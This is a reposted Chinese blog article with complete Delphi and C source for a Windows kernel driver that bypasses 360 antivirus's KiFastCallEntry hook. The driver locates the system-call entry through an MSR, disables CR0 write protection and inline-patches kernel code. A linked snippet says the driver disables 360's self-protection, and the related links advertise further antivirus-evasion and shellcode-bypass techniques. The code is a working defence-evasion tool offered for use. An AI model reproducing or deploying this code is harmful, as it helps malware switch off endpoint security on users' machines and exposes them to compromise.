绕过360的KiFastCallEntry钩子

最新推荐文章于 2021-02-07 22:09:09 发布
转载 最新推荐文章于 2021-02-07 22:09:09 发布 · 757 阅读 · 1 

unit unhook360;

interface

uses
  nt_status, ntoskrnl, native, winioctl, fcall, macros;

type
  THEAD = array[0..4] of byte;
  THEAD1 = array[0..5] of byte;

const
  NtKernel = 'ntoskrnl.exe';
  NtHal = 'hal.dll';
  DeviceName = '\Device\unhook250'; ///设备名
  DosDeviceName = '\??\unhook250'; ///符号链接名
  JmpCode: THEAD = ($E9, $00, $00, $00, $00);
  OrgCode: THEAD = ($8B, $3F, $8B, $1C, $87);
  PushRetCode: THEAD1 = ($68, $00, $00, $00, $00, $C3);

var
  f_oldirql: KIRQL;
  f_spinlock: KSPIN_LOCK;
  uKiFastCallEntryAddr: ULONG;
  HookAddr: ULONG;
  MyJmpRet: ULONG;
  PushRetMem: ULONG;
  g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING;

function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;
function KeRaiseIrqlToDpcLevel(): KIRQL; register; external NtHal name '_KeRaiseIrqlToDpcLevel';
procedure KfLowerIrql(NewIrql: KIRQL); register; external NtHal name '_KfLowerIrql';
procedure KfReleaseSpinLock(SpinLock: PKSPIN_LOCK; NewIrql: KIRQL); register; external NtHal name '_KfReleaseSpinLock';
function KfAcquireSpinLock(SpinLock: PKSPIN_LOCK): KIRQL; register; external NtHal name '_KfAcquireSpinLock';


implementation

procedure FakeKiFastCallEntry; stdcall;
begin
  asm
      mov edi,dword ptr [edi]
      mov ebx,dword ptr [edi+eax*4]
      sub esp,ecx
      shr ecx,2
      jmp [MyJmpRet];
  end;
end;

function LoadKiHooker(): ULONG;
var
  oldIrql: KIRQL;
  status: NTSTATUS;
  uCr0cpu: ULONG;
begin
  asm
  pushfd
  pushad
  mov ecx,$176
  rdmsr
  mov uKiFastCallEntryAddr,eax //获取KiFastCallEntry地址
  xor ecx,ecx
@@Label1:
  cmp ecx,$100
  je @@Label3
  mov edx,DWORD ptr [eax]
  cmp edx,$1C8B3F8B //搜索特征码,获取要Hook的位置
  je @@Label2
  inc eax
  inc ecx
  jmp @@Label1
@@Label2:
  mov HookAddr,eax
@@Label3:
  popad
  popfd
  end;
  if (HookAddr = 0) then result := status;
  DbgPrint('HookAddr is:%x', HookAddr);
  PushRetMem := ULONG(ExAllocatePoolWithTag(NonPagedPool, 6, $544D454D));
  DbgPrint('PushRetMem is:%x', PushRetMem);
  if (PVOID(PushRetMem) = nil) then result := status;

  PULONG(ulong(@JmpCode[1]))^ := PushRetMem - (HookAddr + 5);
  PULONG(ulong(@PushRetCode[1]))^ := DWORD(@FakeKiFastCallEntry);
  DbgPrint('FakeKiFastCallEntry is:%x', DWORD(@FakeKiFastCallEntry));
  MyJmpRet := HookAddr + 10;
  KeInitializeSpinLock(@f_spinlock);
  f_oldirql := KfAcquireSpinLock(@f_spinlock);
  oldIrql := KeRaiseIrqlToDpcLevel();
  asm
    cli
    push  eax
    mov   eax, cr0
    mov   [uCr0cpu], eax
    and   eax, not 000010000h
    mov   cr0, eax
    pop   eax
  end;
  memcpy(pointer(PushRetMem), pointer(@PushRetCode), 6);
  DbgPrint('JmpCode is:%x', DWORD(@JmpCode));
  memcpy(pointer(HookAddr), pointer(@JmpCode), 5);
  asm
    push  eax
    mov   eax, [uCr0cpu]
    mov   cr0, eax
    pop   eax
    sti
  end;
  KfLowerIrql(oldIrql);
  KfReleaseSpinLock(@f_spinlock, f_oldirql);
end;

function UnloadKiHooker(): ULONG;
var
  oldIrql: KIRQL;
  status: NTSTATUS;
  uCr0cpu: ULONG;
begin
  if (HookAddr <> 0) then
  begin
    KeInitializeSpinLock(@f_spinlock);
    f_oldirql := KfAcquireSpinLock(@f_spinlock);
    oldIrql := KeRaiseIrqlToDpcLevel();
    asm
    cli
    push  eax
    mov   eax, cr0
    mov   [uCr0cpu], eax
    and   eax, not 000010000h
    mov   cr0, eax
    pop   eax
    end;
    RtlCopyMemory(pointer(HookAddr), pointer(@OrgCode), 5);
    asm
    push  eax
    mov   eax, [uCr0cpu]
    mov   cr0, eax
    pop   eax
    sti
    end;
    KfLowerIrql(oldIrql);
    KfReleaseSpinLock(@f_spinlock, f_oldirql);
    ExFreePool(PVOID(PushRetMem));
  end;
end;

function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall; ///对打开或关闭请求的响应 ,这里就是简单的返回一个成功
begin
  p_Irp^.IoStatus.Status := STATUS_SUCCESS; ///设置状态为STATUS_SUCCESS 即成功
  p_Irp^.IoStatus.Information := 0;
  IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///调用IoCompleteRequest完成IRP
  Result := STATUS_SUCCESS;
end;

procedure DriverUnload(DriverObject: PDriverObject); stdcall;
begin
  DbgPrint('DriverUnload(DriverObject:0x%.8X)', DriverObject);
  DbgPrint('DriverUnload(-)');
  UnloadKiHooker();
  IoDeleteSymbolicLink(@g_usSymbolicLinkName);
  IoDeleteDevice(DriverObject^.DeviceObject);
end;

function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
  oldIrql: KIRQL;
  status: NTSTATUS;
  DeviceObject: TDeviceObject;
begin
  status := STATUS_DEVICE_CONFIGURATION_ERROR;
  RtlInitUnicodeString(g_usDeviceName, DeviceName);
  RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
  if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
    FILE_DEVICE_UNKNOWN, 0, FALSE,
    DeviceObject) = STATUS_SUCCESS) then
  begin
    DbgPrint('Create Device Success'); ///输出调试字符串
    if (IoCreateSymbolicLink(@g_usSymbolicLinkName, @g_usDeviceName) = STATUS_SUCCESS) then
    begin
      DbgPrint('Create SymbolicLink Success'); ///输出调试字符串
      pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; ///这里把IRP_MJ_CREATE IRP_MJ_CLOSE设置到一个函数上
      pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
      pDriverObject^.DriverUnload := @DriverUnload; ///当驱动动态卸载时执行DriverUnload
      status := STATUS_SUCCESS; ///返回STATUS_SUCCESS;
    end else ///如果创建符号链接不成功
    begin
      DbgPrint('Create SymbolicLink Failed'); ///输出调试字符串
      IoDeleteDevice(@DeviceObject); ///删除设备
    end;
  end;
  LoadKiHooker();
  Result := status;
end;

end.


以下是C版代码

//驱动开发模板
//作者:Tesla.Angela(GDUT.HWL)

#include <ntddk.h>
#include <windef.h>
#include <stdlib.h>
#include <ntimage.h>

#define dprintf            if (DBG) DbgPrint
#define MEM_TAG 'TMEM'
#define   DEVICE_NAME         L"\\Device\\hookkifc"
#define LINK_NAME         L"\\DosDevices\\hookkifc"
#define LINK_GLOBAL_NAME   L"\\DosDevices\\Global\\hookkifc"
#define IOCTL_ULR3IN    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS) //In LONG
#define IOCTL_NULLIN    CTL_CODE(FILE_DEVICE_UNKNOWN, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS) //In LONG

BYTE JmpCode[5]={0xE9,0x00,0x00,0x00,0x00};
BYTE OrgCode[5]={0x8B,0x3F,0x8B,0x1C,0x87};
BYTE PushRetCode[6]={0x68,0x00,0x00,0x00,0x00,0xc3};
KIRQL f_oldirql;
KSPIN_LOCK f_spinlock;
ULONG uKiFastCallEntryAddr=0;
ULONG HookAddr=0;
ULONG MyJmpRet=0;
ULONG PushRetMem=0;


__declspec(naked)void FakeKiFastCallEntry()
{
   _asm
   {
      mov edi,dword ptr [edi]
      mov ebx,dword ptr [edi+eax*4]
      sub esp,ecx
      shr ecx,2
      jmp [MyJmpRet];
   }
}

NTSTATUS LoadKiHooker()
{
        
   NTSTATUS       status = STATUS_SUCCESS;
   KIRQL          oldIrql;
        DbgPrint("LoadKiHooker");
   //系统调用管理器的地址保存在MSR寄存器里面,标识ID为0x176是SYSENTER_EIP_MSR寄存器,存放着KiFastCallEntry地址!所以在这里用rdmsr读取KiFastCallEntry地址;
   __asm
   { 
      pushfd
      pushad
      mov ecx,0x176
      rdmsr
      mov uKiFastCallEntryAddr,eax //获取KiFastCallEntry地址
      xor ecx,ecx
Label1:
      cmp ecx,0x100
      je Label3
      mov edx,DWORD ptr [eax]
      cmp edx,0x1C8B3F8B //搜索特征码,获取要Hook的位置
      je Label2
      inc eax
      inc ecx
      jmp Label1
Label2:
      mov HookAddr,eax
Label3:
      popad
      popfd
   }
   if (HookAddr==0)
   {
      return status;
   }
    //申请分配二级跳转内存
   PushRetMem=(ULONG)ExAllocatePoolWithTag(NonPagedPool,6,MEM_TAG);
   if ((PVOID)PushRetMem==NULL)
   {
      return status;
   }
   DbgPrint("PushRetMem=0x%08X",PushRetMem);
   //一级跳转地址
   *(ULONG*)&JmpCode[1]=(ULONG)(PushRetMem)-(HookAddr+5);
   //二级跳转地址
   *(ULONG*)&PushRetCode[1]=(ULONG)FakeKiFastCallEntry;
   //HOOK返回地址
   MyJmpRet=HookAddr+10;
   //申请并使用自旋锁
   KeInitializeSpinLock(&f_spinlock);
   KeAcquireSpinLock(&f_spinlock,&f_oldirql);
   //提升中断请求级
   oldIrql = KeRaiseIrqlToDpcLevel();
   //关闭中断
   _asm
   {
      CLI                 
      MOV EAX, CR0 
      AND EAX, NOT 10000H
      MOV CR0, EAX      
   }
   //进行HOOK操作
   RtlCopyMemory((PVOID)PushRetMem,PushRetCode,6);
   RtlCopyMemory((PVOID)HookAddr,JmpCode,5);
   //开启中断
   _asm 
   {
      MOV EAX, CR0       
      OR  EAX, 10000H           
      MOV CR0, EAX              
      STI                   
   }
   //恢复先前中断请求级
   KeLowerIrql(oldIrql);
   //释放自旋锁
   KeReleaseSpinLock(&f_spinlock, f_oldirql);
   DbgPrint("KiFastCallEntry=0x%08X",uKiFastCallEntryAddr);
   DbgPrint("HookAddr=0x%08X",HookAddr);
   return status;
}

VOID UnloadKiHooker()
{
        DbgPrint("UnloadKiHooker");
   if (HookAddr!=0)
   {
      KIRQL oldIrql;
      //申请并使用自旋锁
      KeInitializeSpinLock(&f_spinlock);
      KeAcquireSpinLock(&f_spinlock,&f_oldirql);
      //提升中断请求级
      oldIrql = KeRaiseIrqlToDpcLevel();
      //关闭中断
      _asm
      {
         CLI               
         MOV EAX, CR0   
         AND EAX, NOT 10000H
         MOV CR0, EAX      
      }
      //进行还原HOOK操作
      RtlCopyMemory((PVOID)HookAddr,OrgCode,5);
      _asm 
      {
         MOV EAX, CR0       
         OR  EAX, 10000H            
         MOV CR0, EAX              
         STI                  
      }
      //恢复先前中断请求级
      KeLowerIrql(oldIrql);
      //释放自旋锁
      KeReleaseSpinLock(&f_spinlock, f_oldirql);
      //释放内存
      ExFreePool((PVOID)PushRetMem);
   }
}

VOID DriverUnload(PDRIVER_OBJECT pDriverObj)
{   
   UNICODE_STRING strLink;
   //unhook//
   UnloadKiHooker();
   //unhook//
   RtlInitUnicodeString(&strLink, LINK_NAME);
   IoDeleteSymbolicLink(&strLink);
   IoDeleteDevice(pDriverObj->DeviceObject);
}

NTSTATUS DispatchCreate(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
   pIrp->IoStatus.Status = STATUS_SUCCESS;
   pIrp->IoStatus.Information = 0;
   IoCompleteRequest(pIrp, IO_NO_INCREMENT);
   return STATUS_SUCCESS;
}

NTSTATUS DispatchClose(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
   pIrp->IoStatus.Status = STATUS_SUCCESS;
   pIrp->IoStatus.Information = 0;
   IoCompleteRequest(pIrp, IO_NO_INCREMENT);
   return STATUS_SUCCESS;
}

NTSTATUS DispatchIoctl(PDEVICE_OBJECT pDevObj, PIRP pIrp)
{
   NTSTATUS status = STATUS_INVALID_DEVICE_REQUEST,st2;
   PIO_STACK_LOCATION pIrpStack;
   ULONG uIoControlCode;
   PVOID pIoBuffer;
   ULONG uInSize;
   ULONG uOutSize;
   //
   pIrpStack = IoGetCurrentIrpStackLocation(pIrp);
   uIoControlCode = pIrpStack->Parameters.DeviceIoControl.IoControlCode;
   pIoBuffer = pIrp->AssociatedIrp.SystemBuffer;
   uInSize = pIrpStack->Parameters.DeviceIoControl.InputBufferLength;
   uOutSize = pIrpStack->Parameters.DeviceIoControl.OutputBufferLength;
   //
   switch(uIoControlCode)
   {
      /*case IOCTL_ULR3IN:
      {   
         memcpy(&ppid,pIoBuffer,sizeof(ppid));
         DbgPrint("LONG From R3: %ld",ppid);
         st2=PsLookupProcessByProcessId((HANDLE)ppid,&ppep);
         if (NT_SUCCESS(st2))
            LoadKiHooker();
         status = STATUS_SUCCESS;
         break;
      }
      case IOCTL_NULLIN:
      {
         UnloadKiHooker();
         status = STATUS_SUCCESS;
         break;
      }*/
   }
   if(status == STATUS_SUCCESS)
      pIrp->IoStatus.Information = uOutSize;
   else
      pIrp->IoStatus.Information = 0;   
   pIrp->IoStatus.Status = status;
   IoCompleteRequest(pIrp, IO_NO_INCREMENT);
   return status;
}

NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObj, PUNICODE_STRING pRegistryString)
{
   NTSTATUS status = STATUS_SUCCESS;
   UNICODE_STRING ustrLinkName;
   UNICODE_STRING ustrDevName;  
   PDEVICE_OBJECT pDevObj;
   pDriverObj->MajorFunction[IRP_MJ_CREATE] = DispatchCreate;
   pDriverObj->MajorFunction[IRP_MJ_CLOSE] = DispatchClose;
   pDriverObj->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DispatchIoctl;
   pDriverObj->DriverUnload = DriverUnload;
   RtlInitUnicodeString(&ustrDevName, DEVICE_NAME);
   status = IoCreateDevice(pDriverObj, 0, &ustrDevName, FILE_DEVICE_UNKNOWN, 0, FALSE, &pDevObj);
   if(!NT_SUCCESS(status))   return status;
   if(IoIsWdmVersionAvailable(1, 0x10))
      RtlInitUnicodeString(&ustrLinkName, LINK_GLOBAL_NAME);
   else
      RtlInitUnicodeString(&ustrLinkName, LINK_NAME);
   status = IoCreateSymbolicLink(&ustrLinkName, &ustrDevName);     
   if(!NT_SUCCESS(status))
   {
      IoDeleteDevice(pDevObj); 
      return status;
   }
   //hook//
   LoadKiHooker();
   //hook//
   return STATUS_SUCCESS;

转载于:http://www.98exe.net/Article/c/2011-01-07/2494.html

KiFastCallEntryHook
拉塞尔的博客
04-10 1045
     先根据SSDTHook给SSDTTableBase下钩子(Hook掉NtSetEvent函数),然后通过调用ZwSetEvent函数进入FakeSetEvent函数,在FakeSetEvent函数中我们通过栈回溯(ebp+4)找到主调函数KiFastCallEntry的EIP(KiFastCallEntry函数Call NtXX函数指令的下一条指令处,被调函数执行完后主调函数会从EIP中...
构建API调用框架绕过杀软hook
hongduilanjun的博客
05-09 816
我们知道杀软在API函数的监控上一般有两种手段,一种是在3环直接通过挂钩到自己的函数判断是否调用了这个API,另外一种方式就是在0环去往SSDT表的路径上挂钩来判断进0环后的操作。那么我们如果不想杀软监控我们的行为,之前提过的内核重载是一种绕过的方式,但是内核重载的动静太大,这里我们就通过直接重写3环到0环的API,通过重写KiFastCallEntry来自己调用内核的函数,以达到规避杀软的效果。 调用过程 我们首先来看一下API函数的调用过程,这里以OpenProcess函数为例 首先在kernel32
驱动绕过360KiFastCallEntry钩子
weixin_30739595的博客
03-28 474
delphi驱动绕过360KiFastCallEntry钩子加载后360自我保护就换效了,但进程还在,可以直接用任务管理器结束之unitunhook360;interfaceusesnt_status,ntoskrnl,native,winioctl,fcall,macros;typeTHEAD=array[0..4]ofbyte;THEAD1=array[0..5]o...
mysql 钩子程序_驱动绕过360KiFastCallEntry钩子
weixin_39634237的博客
02-07 126
delphi驱动绕过360KiFastCallEntry钩子加载后360自我保护就换效了,但进程还在,可以直接用任务管理器结束之unitunhook360;interfaceusesnt_status,ntoskrnl,native,winioctl,fcall,macros;typeTHEAD=array[0..4]ofbyte;THEAD1=array[0..5]o...
360护心镜脚本分析及N种绕过方式
weixin_34023982的博客
03-08 313
tig3r · 2015/11/24 10:570x00 初识“护心镜”官方介绍:通过Hook XSS的常用函数,并监控DOM元素的创建,从而对整个页面的js行为进行监控。当发现页面中存在XSS攻击行为时,可根据预置的选项,进行放行,提醒用户选择,阻拦三种处理方式,同时预警中心会收到一次事件的告警,安全人员可根据告警进行应急响应处理。在研究如何绕过一个系统之前,不急于直接读代码,先旁敲侧击看看这个...
KiFastCallEntry自己理解
whowho的专栏
07-19 960
#define KI_USER_SHARED_DATA         0xffdf0000 #define SharedUserData  ((KUSER_SHARED_DATA * const) KI_USER_SHARED_DATA)   KUSER_SHARED_DATA 结构区域在 User 和 Kernel 层地址分别为: User 层地址为:0x7ffe0000
Windows 自旋锁分析(一)
zacklin的专栏
04-10 3902
自旋锁是一种在内核定义,只能在内核态下使用的同步机制。自旋锁用来保护共享数据或者资源,使得并发执行的程序或者在高优先级IRQL的对称多处理器的程序能够正确访问这些数据。分析Windows自旋锁,首先需要介绍Windows的IRQL。   1 Interrupt Request Level(IRQL)介绍 IRQL是Interrupt RequestLevel,中断请求级别。一个由window
深入解析KiFastCallEntry钩子技术与系统调用监控
资源摘要信息:"Hook-KiFastCallEntry.rar_钩子与API截获_Visual_C++_" 本文所讨论的技术主题集中在“钩子(Hook)”和“API截获”在系统编程中的应用,尤其是通过Visual C++这一编程环境实现。具体而言,我们将关注...
重载内核实现绕过一切钩子-附详细文档
03-31
在IT领域,尤其是在系统安全和逆向工程中,绕过钩子(hook)技术是一种常见的技术对抗手段。本文将深入探讨“重载内核实现绕过一切钩子”的概念,以及如何通过驱动程序来实现这一目标。我们将主要关注内核级别的操作...
Hook-KiFastCallEntry.rar_钩子与API截获_Visual_C++_
08-11
Hook KiFastCallEntry监控系统调用这是一个监控特定进程系统调用的小程序,整理硬盘时找到的,发出来跟大家分享。原理很简单,通过hook KiFastCallEntry实现,很老的技术了。
hook NtReadVirtualMemory干扰杀软扫描
weixin_33978044的博客
09-10 636
    信息来源:邪恶八进制信息安全团队(www.eviloctal.com)文章作者:asm(http://www.sbasm.cn)写了个对抗扫描的东西,跟大家分享!技术含量不高,大牛飘过。一直以来写的都是ring3代码,现在很认真的拼凑了一份山寨版的驱动代码,很久没这么认真过了。希望哪位大牛能指点一下,指出代码中可能存在BOSD的隐患。其他人就跟我一起学习吧~~ 很久以来,做木马免杀...
venom结合Metasploit绕过360安全卫士
andyshen1995的博客
01-20 608
原理:msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了 一些Veil-Evasion.py, unicorn.py, powersploit.py等工具上的技术。但是venom 是基于 bash 编写的,而不是 基于 Python。相比veil evasion在payload格式...
自写API绕过R3下所有HOOK
huobengle
11-09 960
拿FindWindow来做测试,先OD跟一下HWND hWnd=::FindWindow(_T("SciCalc"),_T("计算器")); ::SendMessage(hWnd,WM_CLOSE,NULL,NULL);为了方便分析参数,给FindWindow也传递了类名。 OD载入,bp FindWindowW,运行后断下来,来到FindWindowW里面77D2C9C5 55 ...
破解XXX游戏驱动保护过程总结
weixin_34418883的博客
07-23 1436
刚刚接触软件破解还有驱动编写,好多东西都不熟,折腾了好久,把中间可能对大家有价值的过程记录下来。    刚开始碰到的问题就是不能内核调试,因为要写驱动,需要用到。一般禁用内核调试都是在驱动里调用KdDisableDebugger,往上回溯一个函数,基本上就是驱动检测禁用是否成功的代码,否则就是一个循环不停的调用KdDisableDebugger函数。   我的做法是修改KdDisableDebug...
360内核 inline Hook 分析
09-09 601
今天下载了360的最新的版本,想看下最近360在内核的钩子与以前有没有变化! 与以前一样还是通过分析找到360钩子的地方。结果发现与以前没有什么变化。 Hook之前: kd&gt; u nt!KiFastCallEntry+0xe1 nt!KiFastCallEntry+0xe1: 8053e621 2be1 sub esp,ecx 8053e623 c1e9...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值